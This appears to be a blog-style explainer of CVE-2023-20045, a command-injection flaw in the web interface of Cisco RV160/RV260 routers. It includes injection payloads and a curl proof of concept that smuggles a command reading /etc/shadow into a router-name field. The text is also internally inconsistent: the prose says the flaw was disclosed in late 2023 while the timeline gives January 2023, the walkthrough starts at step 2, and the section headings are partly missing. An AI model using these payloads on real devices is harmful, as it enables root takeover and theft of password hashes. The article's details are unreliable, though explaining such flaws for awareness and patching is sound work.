CVE-2023-20045 - The Hidden Risk in Cisco RV160/RV260 Routers Exploited

In late 2023, a serious vulnerability was disclosed under the identifier CVE-2023-20045. This bug impacts Cisco Small Business RV160 and RV260 Series VPN routers. Cisco devices are widely used in small business offices and remote branches because they’re affordable, reliable, and easy to manage.

But beneath that friendly interface, an attacker with admin login can break past the front gate and take total control of the device—right down to the operating system. In this post, we’ll explain in simple terms *what the problem is, how it works, how it’s being exploited in the wild*, and what you should do if your office uses these routers.

Attack Vector: Sending a specially-crafted request to the web management interface

- Cisco Advisory: Cisco Security Advisory - CVE-2023-20045

What’s the Issue?

The main problem here is *insufficient user input validation* in the router’s web management interface. That means the software doesn’t properly check what an administrator enters into certain web forms or API fields.

If a logged-in admin enters "normal" data, everything is okay. But if someone enters malicious input—like Linux command syntax—they can trick the router into running dangerous commands as the all-powerful root user.

Step-by-Step: How the Exploit Works

Let’s walk through what actually happens on a vulnerable device.

2. Attacker Crafts a Malicious Request

Using their access, the attacker sends a request to the web-based manager. For example, when setting some configuration like the hostname, syslog server, or other field, the software takes whatever you enter and uses it in a backend shell command without checking properly.

Suppose there’s a web form for setting the router’s device name. The attacker submits

myrouter; cat /etc/passwd > /tmp/leak.txt #

Now, instead of just setting the router name to "myrouter," the router’s system command in the backend tries to run:

set_hostname myrouter; cat /etc/passwd > /tmp/leak.txt # ...

myrouter; ends the legit command.

- cat /etc/passwd > /tmp/leak.txt is then executed separately, writing out vital OS info.

Proof-of-Concept (PoC) Code

Let's demonstrate with a basic PoC using curl (a command-line tool for making HTTP requests). Do NOT use on systems you do not own/authorize. This is for awareness.

# Replace values below
ADMIN_USER=admin
ADMIN_PASS=AdminPassword
ROUTER_IP=192.168.1.1

curl -s -u "$ADMIN_USER:$ADMIN_PASS" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "routername=router; cat /etc/shadow > /tmp/grabbed.txt#" \
  http://$ROUTER_IP/cgi-bin/config.cgi

What’s happening?  
If the routername field isn’t properly sanitized, this sends a payload that runs cat /etc/shadow > /tmp/grabbed.txt as root. The attacker can later read /tmp/grabbed.txt to extract hashed passwords.

Important Note:
The actual vulnerable fields and endpoints may vary by firmware and model. Researchers have found multiple fields that are vulnerable.

Bypass of VPN security: They can eavesdrop, create malicious VPN tunnels, or inject traffic.

- Persistence: Malicious files/scripts can be added to stay after reboots.

Pivoting: Attackers can use the trusted network position to attack internal systems.

Cisco has confirmed limited, targeted exploitation of this flaw in the wild. In practice, attackers first steal or guess admin passwords (which are notoriously weak in small business setups), then use this exploit for full takeover.

Official References

- Cisco Security Advisory: cisco-sa-sb-rv-command-inject-p9KQ
- NIST NVD - CVE-2023-20045
- Exploit Database details _(note: may require login)_

Apply Cisco’s firmware updates

Cisco has released patches. Download and update your router from the Cisco Support Page.

Conclusion

CVE-2023-20045 reminds us that even “secure” VPN routers can hide dangerous vulnerabilities behind the login screen. Once inside with admin rights, a hacker can break out of every box and take over the device in a matter of seconds. In a small business, this could mean the difference between a safe network and an exposed one.

Stay up-to-date. Patch often. Restrict access. And always—always—use strong, unique admin passwords.

Further Reading

- Cisco Product Security Incident Response Team (PSIRT)
- Hardening Cisco Small Business Routers

Timeline

Published on: 01/20/2023 07:15:00 UTC
Last modified on: 01/30/2023 19:00:00 UTC